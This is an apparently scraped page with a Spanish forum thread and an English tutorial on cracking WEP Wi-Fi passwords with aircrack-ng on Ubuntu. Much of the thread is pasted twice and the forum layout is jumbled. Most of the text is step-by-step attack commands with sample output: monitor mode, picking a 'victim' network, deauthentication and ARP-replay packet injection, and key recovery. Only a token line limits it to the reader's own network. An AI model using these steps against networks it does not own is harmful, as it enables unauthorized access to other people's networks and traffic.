Cracking Wireless

Descargar como docx, pdf o txt
Descargar como docx, pdf o txt
Está en la página 1de 14

este tuto solo sirve para que lo hagais solo con vuestra red 

     

1-> abrimos la terminal ( supongo que todo el mundo tiene instalado el airmon, airoplay ....) 
nos hacemos super usuarios - sudo su 

2-> escribimos ifconfig buscas tu wlanX (tarjeta de red inal.) y copias su direccion en un bloc 

3->airmon-ng start wlanX(la X equivale a el numero que te ponia antes , esto hara que la tarj de
red se ponga en modo monitor) ( se puede ver el chipset no es necesario) 

pondra - monitor mode enabled on monX (puede poner mon0 , mon1 ... es decir apuntais lo que os
toque) 

4->airodump-ng monX 
ahora buscara redes ... 
lo parais pulsando ctrl+c 
de ahi apuntais el nombre , el num. de red y el canal (CH)de la victima 

5->airodump-ng -c (canal CH) -w (nombre red) monX 


esto filtrara las redes (-c) en el canal elejido (CH) 

esta es la primera parte pero como asi seria lentisimo abrimos otra terminal ( sin cerrar esta) y
empezamos 
(aprovecho para decir que este tuto esta creado 100% por mi , spanner) 

1->aireplay-ng -1 0 -e (nombre de red) -a (numero tarjeta victima) -h (nuestro numero) monX 


los numeros son las 2 direcciones que hemos sacado antes la nuestra en ifconfig(paso 2) y la de la
victima en airodump-ng monX (paso4) 
2->aireplay-ng -3 -b (numero de tarjeta victima) -h ( nuestro numero) monX 

3->ahora empezara a capturar paquetes o caps , esperamos a tener unas 90.000 o 100.000 (no
tarda mucho) 

4->cuando termine pulsamos ctrl+c y escribimos aircrack-ng *.cap 


el *^equivale a cualquier nombre es decir si la red se llama default se puede poner tambien,
aircrack-ng default.cap 
pero no es necesario 
despues de esto nos saldra una lista de redes y delante un numero , pues escribimos el numero de
la red victima y ENTER , el pc nos descifrara la calve el solo. 

esto lo encontre buscando manuales crakeos de redes wifi sin tener que utilisar un CD LIVE
 y lo encontre para  unbuntu.
este  manula es 100% efectivo auque tiene unas modificaciones que le hice yo mismo con la
practica.

prime que todo tiene que descargar el programa.


abrimos una shell y escrivimos el siguente codigo.

sudo apt-get install macchanger aircrack-ng o sudo apt-get install aircrack-ng


culaquiera de los dos codigos funciona

despues que este instalado podemos empesar.

tenemos que  saber el nombre de nuestra interfaz de red, ya que la necesitaremos en casi
cada paso del tutorial, la podremos averiguar con airmon-ng, escriviendo el siguiente codigo
el la shell.

skull?@skull?-laptop:~$ sudo airmon-ng

Interface           Chipset      Driver

wlan0           Atheros            ath5k - [phy0]


      

skull?@skull?-laptop:~$ 
Ahora con airodump-ng podremos ver un listado de todas las redes que estén al alcance:
(wlan0 es el nombre de mi interfaz de red, subsituyela por la tuya)

skull?@skull?-laptop:~$sudo airodump-ng wlan0

Y veremos algo parecido a esto:

     CH  9 ][ Elapsed: 4 s ][ 2007-02-25 16:47


                                                                                                               
    BSSID                    PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
    00:09:5B:1C:AA:1D   11  16         10        0         0    11  54. OPN                      
NETGEAR                         
    00:14:6C:7A:41:81   34 100        57       14         1    9   11  WEP    WEP             bigbear  

si no te aparese esto y te pone algo como esto:

skull?@skull?-laptop:~$ sudo airodump-ng wlan0


ioctl(SIOCSIWMODE) failed: Device or resource busy

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,


ARPHRD_IEEE80211_FU LL or ARPHRD_IEEE80211_PR ISM instead.  Make
sure RFMON is enabled: run 'airmon-ng start wlan0 <#>'
Sysfs injection support was not found either.

skull?@skull-laptop:~$ 

eso es porque wlan0 no es con que vas a cacturar las red wifi. (pienso yo)

entonses yo resolvi eso haciendo lo que me dise el mensaje poniendo el siguiente codigo.

skull?@skull?-laptop:~$ sudo airmon-ng start wlan0 

Found 5 processes that could cause trouble.


If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID   Name
516   avahi-daemon
517   avahi-daemon
545   NetworkManager
586   wpa_supplicant
2860   dhclient
Process with PID 4164 (airodump-ng) is running on interface mon0

Interface   Chipset      Driver

wlan0      Atheros    ath5k - [phy0]


                   (monitor mode enabled on mon2)
mon0      Atheros    ath5k - [phy0]
mon1      Atheros    ath5k - [phy0]
skull@skull?-laptop:~$

ahora tenemos que cambiar wlan0 por mon0

y el codigo que dara asi:

skull?@skull?-laptop:~$sudo airodump-ng mon0

y ahora si nos aparesera esto.

CH  9 ][ Elapsed: 4 s ][ 2007-02-25 16:47


                                                                                                               
    BSSID                    PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
    00:09:5B:1C:AA:1D   11  16         10        0         0    11  54. OPN                      
NETGEAR                         
    00:14:6C:7A:41:81   34 100        57       14         1    9   11  WEP    WEP             bigbear  

A partir de esta lista, tenemos que elegir una victima, para ello debemos fijarnos en lo
siguiente:

   1. El tipo de clave que utiliza [ENC]


   2. La MAC del punto de acceso al que queremos atacar [BSSID]
   3. El canal de la red que queremos atacar [CH]
   4. Comprobar que esta capturando IV's, sin esto no podremos hacer nada... [#Data]

Bien, vamos a poner como ejemplo que queremos crackear la clave WEP de la red bigbear.

Siguiendo la lista anterior, hay que fijarse en lo siguiente:

Utiliza una clave WEP (también es posible crackear redes con clave WPA, pero lo explicare en
otro tutorial.. )
La MAC o BSSID del punto de acceso de la red bigbear: 00:14:6C:7A:41:81
El canal en el que emite la red: Canal 9
Y finalmente podemos comprobar que ya hemos capturado 14 IV's, en la columna [#Data]

Si no recoje datas (IV' , no nos servirá de nada recojer paquetes de la red, ya que sin los
IV's no podemos desencriptar la contraseña.

Si tenemos todo lo necesario ya podemos empezar a capturar paquetes con airodump a


través del siguiente comando:

 airodump-ng wlan0 --bssid 00:11:22:33:44:55 --channel 0 --w out

Creo que no hace falta decir que hay que substituir la interfaz de red (wlan0) por la vuestra,
al igual que el bssid y el canal, por la MAC y el canal de la red que queremos atacar.
Y la última opción (--w out) es el nombre del archivo en el que se guardarán los paquetes
capturados, libre elección, tan solo hay que tener en cuenta que se guardarán en el mismo
directorio desde el que estamos ejecutando airodump-ng.
y el codigo que daria asi:

skull?@skull?-laptop:~$sudo airodump-ng mon0 --bssid 00:11:22:33:44:55 --channel 9 --w


out

Ahora podremos ver otra vez la misma lista de antes, pero solo con la red que hemos elegido
como víctima, y podremos observar como va capturando datos, en la columna #Data:

CH  9 ][ Elapsed: 12 min ][ 2007-02-25 17:24


                                                                                                           
BSSID                        PWR  RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                                         
00:14:6C:7A:41:81   34     100  59424        33258 1      9  11  WEP  WEP                bigbear

Si nos fijamos en el código anterior, podemos ver que ya hemos capturado 33258 IV's (en
redes con clave WEP la columna #Data es equivalente a los IV's capturados.), por lo que ya
podemos intentar crackear la clave con aircrack-ng:

skull?@skull?-laptop:~$sudo aircrack-ng *.cap

Sí seguimos los pasos 1 a 1 y no hay ningún error, este será el resultado:

Y listo!! si todo va bién ya tendremos la clave WEP!!!

Según la web oficial de Aircrack-ng es necesario tener 600.000 IV's para claves WEP de 40
bits, y 1.500.000 IV's para claves de 104 bits.

paguina oficial de donde saque el tema. aqui

espero que le aya gustado este manual. 

por cualquier duda pregunten que aqui estamos para serviles.

asta luego.

 En línea

Aetsu Re: Manual para crackear redes wifi con seguridad


Moderador tipo WEP con Ubuntu
« Respuesta #1 : 24 de Noviembre de 2009,
 Desconectado 11:33:28 »

Sexo:  Muy buen tuto, aunque podrias añadir esto para que los data
Mensajes: 1,073 suban mas rápido, que sino recuerdo mal se conoce
como ataque 1+3:
-  Estos pasos se realizarían una vez el airodump-ng esta en
funcionamiento:
  Nos asociamos:
Código:
aireplay-ng -1 10 -e <BSSID> -a <ESSID> -h
<MAC_DE_NUESTRA_TARJETA> <interfaz>
esto según el ejemplo seria:
Código:
aireplay-ng -1 10 -e 00:14:6C:7A:41:81 -a
bigbear -h <MAC_DE_NUESTRA_TARJETA>
mon0
  Tratamos de reinyectar data:
Código:
aireplay-ng -3 -b <BSSID> -h
<MAC_DE_NUESTRA_TARJETA> <interfaz>
que con el ejemplo seria:
Código:
aireplay-ng -3 -b 00:14:6C:7A:41:81 -h
<MAC_DE_NUESTRA_TARJETA> mon0
Una vez realizado esto y pasado un breve tiempo, los data
deberian empezar a subir rápidamente.

A continuación ya solo queda lanzar el aircrack-ng.

Un saludo y buen tuto 

 En línea

FAQ's Wireless -- Leed antes de preguntar --

skull? Re: Manual para crackear redes wifi con seguridad tipo WEP
Yo vivo en CPH con Ubuntu
« Respuesta #2 : 25 de Noviembre de 2009, 07:20:33 »
 Desconectado
ehy no conosia eso grasias. pero estoy confuso en algo esto se ase des
Sexo:  pues de poner este codigo.
Mensajes: 282
skull?@skull?-laptop:~$sudo airodump-ng mon0 --bssid
00:11:22:33:44:55 --channel 9 --w out

y si es asi. los codigos se ponen en otra shell o tendria que darle a


porque no CTRL+C y poner el codigo.
querer cer un  y si tambien es asi en tonses tiene que apareser algo asi:
guro? yo si!!
he interface MAC (00:22:68:AC:44:67) doesn't match the specified MAC
(-h).
   ifconfig mon0 hw ether 00:1D:72:6C:D0:DD
23:06:14  Waiting for beacon frame (BSSID: 00:20:A6:56:20:B4) on
channel 1
Saving ARP requests in replay_arp-1125-230614.cap
You should also start airodump-ng to capture replies.
read 2278 pakets (got 0 ARP resquest and 0 ACKs ) , sent 0 pakets .... (0
pps)

y des pues escrivir el siguiente codigo:

skull?@skull?-laptop:~$sudo aircrack-ng *.cap

esto lo encontre buscando manuales crakeos de redes wifi sin tener que utilisar un CD LIVE
 y lo encontre para  unbuntu.
este  manula es 100% efectivo auque tiene unas modificaciones que le hice yo mismo con la
practica.

prime que todo tiene que descargar el programa.


abrimos una shell y escrivimos el siguente codigo.

sudo apt-get install macchanger aircrack-ng o sudo apt-get install aircrack-ng


culaquiera de los dos codigos funciona

despues que este instalado podemos empesar.

tenemos que  saber el nombre de nuestra interfaz de red, ya que la necesitaremos en casi
cada paso del tutorial, la podremos averiguar con airmon-ng, escriviendo el siguiente codigo
el la shell.

skull?@skull?-laptop:~$ sudo airmon-ng

Interface           Chipset      Driver

wlan0           Atheros            ath5k - [phy0]


      

skull?@skull?-laptop:~$ 

Ahora con airodump-ng podremos ver un listado de todas las redes que estén al alcance:
(wlan0 es el nombre de mi interfaz de red, subsituyela por la tuya)

skull?@skull?-laptop:~$sudo airodump-ng wlan0

Y veremos algo parecido a esto:

     CH  9 ][ Elapsed: 4 s ][ 2007-02-25 16:47


                                                                                                               
    BSSID                    PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
    00:09:5B:1C:AA:1D   11  16         10        0         0    11  54. OPN                      
NETGEAR                         
    00:14:6C:7A:41:81   34 100        57       14         1    9   11  WEP    WEP             bigbear  

si no te aparese esto y te pone algo como esto:

skull?@skull?-laptop:~$ sudo airodump-ng wlan0


ioctl(SIOCSIWMODE) failed: Device or resource busy

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,


ARPHRD_IEEE80211_FU LL or ARPHRD_IEEE80211_PR ISM instead.  Make
sure RFMON is enabled: run 'airmon-ng start wlan0 <#>'
Sysfs injection support was not found either.

skull?@skull-laptop:~$ 

eso es porque wlan0 no es con que vas a cacturar las red wifi. (pienso yo)

entonses yo resolvi eso haciendo lo que me dise el mensaje poniendo el siguiente codigo.

skull?@skull?-laptop:~$ sudo airmon-ng start wlan0 

Found 5 processes that could cause trouble.


If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID   Name
516   avahi-daemon
517   avahi-daemon
545   NetworkManager
586   wpa_supplicant
2860   dhclient
Process with PID 4164 (airodump-ng) is running on interface mon0

Interface   Chipset      Driver

wlan0      Atheros    ath5k - [phy0]


                   (monitor mode enabled on mon2)
mon0      Atheros    ath5k - [phy0]
mon1      Atheros    ath5k - [phy0]

skull@skull?-laptop:~$

ahora tenemos que cambiar wlan0 por mon0

y el codigo que dara asi:

skull?@skull?-laptop:~$sudo airodump-ng mon0

y ahora si nos aparesera esto.

CH  9 ][ Elapsed: 4 s ][ 2007-02-25 16:47


                                                                                                               
    BSSID                    PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
    00:09:5B:1C:AA:1D   11  16         10        0         0    11  54. OPN                      
NETGEAR                         
    00:14:6C:7A:41:81   34 100        57       14         1    9   11  WEP    WEP             bigbear  

A partir de esta lista, tenemos que elegir una victima, para ello debemos fijarnos en lo
siguiente:

   1. El tipo de clave que utiliza [ENC]


   2. La MAC del punto de acceso al que queremos atacar [BSSID]
   3. El canal de la red que queremos atacar [CH]
   4. Comprobar que esta capturando IV's, sin esto no podremos hacer nada... [#Data]

Bien, vamos a poner como ejemplo que queremos crackear la clave WEP de la red bigbear.

Siguiendo la lista anterior, hay que fijarse en lo siguiente:

Utiliza una clave WEP (también es posible crackear redes con clave WPA, pero lo explicare en
otro tutorial.. )
La MAC o BSSID del punto de acceso de la red bigbear: 00:14:6C:7A:41:81
El canal en el que emite la red: Canal 9
Y finalmente podemos comprobar que ya hemos capturado 14 IV's, en la columna [#Data]

Si no recoje datas (IV' , no nos servirá de nada recojer paquetes de la red, ya que sin los
IV's no podemos desencriptar la contraseña.

Si tenemos todo lo necesario ya podemos empezar a capturar paquetes con airodump a


través del siguiente comando:

 airodump-ng wlan0 --bssid 00:11:22:33:44:55 --channel 0 --w out

Creo que no hace falta decir que hay que substituir la interfaz de red (wlan0) por la vuestra,
al igual que el bssid y el canal, por la MAC y el canal de la red que queremos atacar.
Y la última opción (--w out) es el nombre del archivo en el que se guardarán los paquetes
capturados, libre elección, tan solo hay que tener en cuenta que se guardarán en el mismo
directorio desde el que estamos ejecutando airodump-ng.

y el codigo que daria asi:

skull?@skull?-laptop:~$sudo airodump-ng mon0 --bssid 00:11:22:33:44:55 --channel 9 --w


out

Ahora podremos ver otra vez la misma lista de antes, pero solo con la red que hemos elegido
como víctima, y podremos observar como va capturando datos, en la columna #Data:

CH  9 ][ Elapsed: 12 min ][ 2007-02-25 17:24


                                                                                                           
BSSID                        PWR  RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                                         
00:14:6C:7A:41:81   34     100  59424        33258 1      9  11  WEP  WEP                bigbear

Si nos fijamos en el código anterior, podemos ver que ya hemos capturado 33258 IV's (en
redes con clave WEP la columna #Data es equivalente a los IV's capturados.), por lo que ya
podemos intentar crackear la clave con aircrack-ng:

skull?@skull?-laptop:~$sudo aircrack-ng *.cap

Sí seguimos los pasos 1 a 1 y no hay ningún error, este será el resultado:

Y listo!! si todo va bién ya tendremos la clave WEP!!!

Según la web oficial de Aircrack-ng es necesario tener 600.000 IV's para claves WEP de 40
bits, y 1.500.000 IV's para claves de 104 bits.

paguina oficial de donde saque el tema. aqui

espero que le aya gustado este manual. 

por cualquier duda pregunten que aqui estamos para serviles.

asta luego.

 En línea

Aetsu Re: Manual para crackear redes wifi con seguridad


Moderador tipo WEP con Ubuntu
« Respuesta #1 : 24 de Noviembre de 2009,
 Desconectado 11:33:28 »

Sexo:  Muy buen tuto, aunque podrias añadir esto para que los data
Mensajes: 1,073 suban mas rápido, que sino recuerdo mal se conoce
como ataque 1+3:
-  Estos pasos se realizarían una vez el airodump-ng esta en
funcionamiento:
  Nos asociamos:
Código:
aireplay-ng -1 10 -e <BSSID> -a <ESSID> -h
<MAC_DE_NUESTRA_TARJETA> <interfaz>
esto según el ejemplo seria:
Código:
aireplay-ng -1 10 -e 00:14:6C:7A:41:81 -a
bigbear -h <MAC_DE_NUESTRA_TARJETA>
mon0
  Tratamos de reinyectar data:
Código:
aireplay-ng -3 -b <BSSID> -h
<MAC_DE_NUESTRA_TARJETA> <interfaz>
que con el ejemplo seria:
Código:
aireplay-ng -3 -b 00:14:6C:7A:41:81 -h
<MAC_DE_NUESTRA_TARJETA> mon0
Una vez realizado esto y pasado un breve tiempo, los data
deberian empezar a subir rápidamente.

A continuación ya solo queda lanzar el aircrack-ng.

Un saludo y buen tuto 

 En línea

FAQ's Wireless -- Leed antes de preguntar --

skull? Re: Manual para crackear redes wifi con seguridad tipo WEP
Yo vivo en CPH con Ubuntu
« Respuesta #2 : 25 de Noviembre de 2009, 07:20:33 »
 Desconectado
ehy no conosia eso grasias. pero estoy confuso en algo esto se ase des
Sexo:  pues de poner este codigo.
Mensajes: 282
skull?@skull?-laptop:~$sudo airodump-ng mon0 --bssid
00:11:22:33:44:55 --channel 9 --w out

y si es asi. los codigos se ponen en otra shell o tendria que darle a


porque no CTRL+C y poner el codigo.
querer cer un  y si tambien es asi en tonses tiene que apareser algo asi:
guro? yo si!!
he interface MAC (00:22:68:AC:44:67) doesn't match the specified MAC
(-h).
   ifconfig mon0 hw ether 00:1D:72:6C:D0:DD
23:06:14  Waiting for beacon frame (BSSID: 00:20:A6:56:20:B4) on
channel 1
Saving ARP requests in replay_arp-1125-230614.cap
You should also start airodump-ng to capture replies.
read 2278 pakets (got 0 ARP resquest and 0 ACKs ) , sent 0 pakets .... (0
pps)

y des pues escrivir el siguiente codigo:

skull?@skull?-laptop:~$sudo aircrack-ng *.cap

After the article on cracking a WEP key using a MAC, many users have requested similar *testing* of their
security procedures using a popular LINUX distro and WinXP. This article delves into cracking a WEP key
and a WEP key force using the most popular and user friendly LINUX distro out there : UBUNTU. All you need
is a laptop with a wireless card and a copy of Ubuntu Linux. NOTE: Most of the Intel wireless adapters that
come in built in most laptops these days should work.  
Ubuntu (IPA pronunciation: /u’buntu/) is a Linux distribution offering an operating system predominantly
targeted at desktop computers. Based on Debian GNU/Linux, Ubuntu concentrates on usability, freedom from
restriction of use, regular releases, and ease of installation. Ubuntu is sponsored by Canonical Ltd., by South
African Mark Shuttleworth; the name of the distribution comes from the African concept of ubuntu (roughly,
“humanity towards others”).
First step, obviously, is to install Ubuntu. Just boot from the CD and follow the directions. If you have problems
or need help installing UBUNTU, follow this guide straight from Ubuntu. Once you have the OS installed and
configured/customized to your liking we can proceed with the first step. I’d suggest performing the following
steps in order, otherwise you may have problems.
Next, install the extra repositories and all the programs that Ubuntu doesn’t preinstall. Make sure your machine
is able to establish a connection to the Internet. If you can only connect via wireless and are having problems,
there is a package called Wi-Fi radar that is helpful. To install the extra repositories, open a terminal window
and type the following:
sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup
sudo gedit /etc/apt/sources.list
While in the editor, replace everything with:
## Add comments (##) in front of any line to remove it from being checked.
## Use the following sources.list at your own risk.
deb http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse
## MAJOR BUG FIX UPDATES produced after the final release
deb http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse
## UBUNTU SECURITY UPDATES
deb http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse
deb-src http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse
## BACKPORTS REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse
## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://packages.freecontrib.org/ubuntu/plf dapper free non-free
deb-src http://packages.freecontrib.org/ubuntu/plf dapper free non-free
Save the file and exit the text editor. Next type the command:
sudo apt-get update
Now we have to install the packages we’ll need later on:
sudo apt-get install build-essential
sudo apt-get install aircrack
sudo apt-get install kismet
sudo apt-get install airsnort
sudo apt-get install linux-source
sudo apt-get install linux-headers
sudo apt-get install sharutils
Next, you should update your entire system by going to the System Menu>Administration>Update Manager.
Click ‘Check’ and begin installing updates. Then reboot your system. After this is done, it’s time to patch the
Madwifi drivers.
This is where everything can be tricky. My wireless card (Linksys WPC55AG) uses the Atheros driver, which I
needed to patch. If you have a different driver, you’re going to need to find out whether or not you need to
patch your drivers, or if they’ll even work with the Aircrack suite. The forums at aircrack-ng.org are a good
place to look and so is a Google search. If you have an Atheros card, it will be called ath0 when you
type iwconfig in the terminal window, or there will be a line that says Ethernet controller: Atheros
Communications… when you type lspci in the terminal.
Let’s apply the madwifi patch which you’ll need if you’re using the Atheros driver. This will temporarily disable
your wireless card when it deletes the old drivers of the disk. First we’re going to navigate to the /usr/src
directory, download the new drivers, delete the old drivers, then install the new ones and apply the patch. You
can just copy and paste the commands below into the terminal or type them yourself. So. first, let’s get the
patch and then get the corresponding version of the driver
sudo -i
cd /usr/src
get http://patches.aircrack-ng.org/madwifi-ng-r1679.patch
wget http://snapshots.madwifi.org/madwifi-ng/madwifi-ng-r1679-20060707.tar.gz
ifconfig ath0 down
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
find /lib/modules -name ‘ath*’ -exec rm -v {} \;
find /lib/modules -name ‘wlan*’ -exec rm -v {} \;
# tar zxvf madwifi-ng-r1679-20060707.tar.gz
# cd madwifi-ng-r1679-20060707/
# patch -Np1 -i ../madwifi-ng-r1679.patch
# make
# make install
# mod_probe ath_pci
NOTE: Some people have been having problems with the modprobe command. A comment below contains a
fix in some cases:
However, during Madwifi Installation I got this warning:
Warning: could not find /usr/src/madwifi/ath_hal/.hal.o.cmd for /usr/src/madwifi/ath_hal/hal.o
This warning can be IGNORED.
When I ran “modprobe ath_pci” it gave me an error message and “dmesg” gave me some gibberish about
“disagrees about version of symbol”.
I browsed the web and found the solution: You have to delete the linux-restricted modules. Just search for
“linux-restricted” in Synaptic. I removed everything but “linux-restricted-modules-common”. Then I compiled the
madwifi again and ran “modeprobe ath_pci” again. NO ERROR this time! Authenticating and injecting works!
Apparently some network cards with atheros chipset cause problems if you don’t remove the linux-restricdet-
modules.
If you are using the Atheros driver, next we need to configure kismet to use the right source. If you are using
another driver you’ll have to look up what syntax you use. First navigate to the Kismet config, then change the
source line.
sudo gedit /etc/kismet/kismet.conf
Change the line that begins with ’source=’ to ’source=madwifi_ag,ath0,madwifi’. Now reboot the computer.
After it boots back up you should be able to access the internet again via your wireless card.
Now we can begin cracking. Open up a terminal window, enter monitor mode, and run kismet.
sudo airmon start ath0
sudo kismet
Locate the wireless network you want to crack, and note its ESSID and channel. Then exit by pressing Ctrl-C.
Next, run airodump.
sudo airodump ath0 filename channel# 1
The one at the end lets Airodump know we only want to capture IV’s. The filename can be anything you want,
and will be saved in your home directory (or whatever directory you run the command from) as filename.ivs.
Copy the bssid of the wireless network from the airodump window by selecting it and pressing Shift+Ctrl+C.
Open up a new terminal window so we can run aireplay to start injecting packets so our data count goes up.
We want the data column in airodump to reach between 100,000 and 400,000. The more packets we have, the
faster aircrack can find the WEP key. If the WEP key is 128 bits, we may need up to 1,000,000 packets.
sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0
This should associate the network with the wireless connection. If it times out repeatedly, you need to be closer
to the wireless router or change your interface rate by typing ’sudo iwconfig ath0 rate 1M’.
Next we want to start injecting packets.
sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0
At first, it will only read packets, and say 0 ARP requests and 0 packets sent. Just wait a minute or two and it
will start sending packets in large quantities. If it returns text that says it has been deauthorized, press Ctrl+C
and run the command again. You can try to speed things up by entering this command:
sudo aireplay -0 ath0 -a BSSID ath0
Otherwise just sit back and wait. As soon as packets begin to be sent, the data field in Airodump should start
flying. Wait until the desired number of packets have been recieved, then open a new terminal window and run
aircrack.
sudo aircrack filename.ivs
After a minute, aircrack should return the WEP key. If it doesn’t, collect more packets.

También podría gustarte